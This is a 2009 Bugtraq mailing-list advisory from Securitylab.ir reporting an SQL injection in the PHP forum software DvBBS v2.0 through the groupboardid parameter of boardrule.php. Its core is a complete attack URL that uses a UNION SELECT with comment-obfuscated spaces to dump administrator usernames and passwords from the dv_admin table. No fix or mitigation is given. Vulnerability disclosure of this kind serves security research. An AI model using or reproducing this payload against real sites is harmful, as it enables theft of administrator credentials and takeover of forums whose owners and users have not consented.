[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
DvBBS v2.0(PHP) boardrule.php Sql injection
- To: bugtraq@xxxxxxxxxxxxxxxxx
- Subject: DvBBS v2.0(PHP) boardrule.php Sql injection
- From: info@xxxxxxxxxxxxxx
- Date: 4 Sep 2009 10:07:49 -0000
########################## Securitylab.ir ########################
# Application Info:
# Name: DVBBS (php)
# Version: 2.0
# Vendor: http://p.dvbbs.net
#################################################################
# Discoverd By: Securitylab.ir
# Website: http://securitylab.ir
# Contacts: admin[at]securitylab.ir & info@securitylab[dot]ir
#################################################################
# Vulnerability Info:
# Type: Sql Injection
# Risk: Medium
#===========================================================
#
http://site.com/[Path]/boardrule.php?groupboardid=1/**/union/**/select/**/concat(0xBAF3CCA8D3C3BBA7C3FBA3BA,username,0x202020C3DCC2EBA3BA,password)/**/from%20dv_admin%20where%20id%20between%201%20and%204/**/
#===========================================================
#################################################################
# Securitylab Security Research Team
###################################################################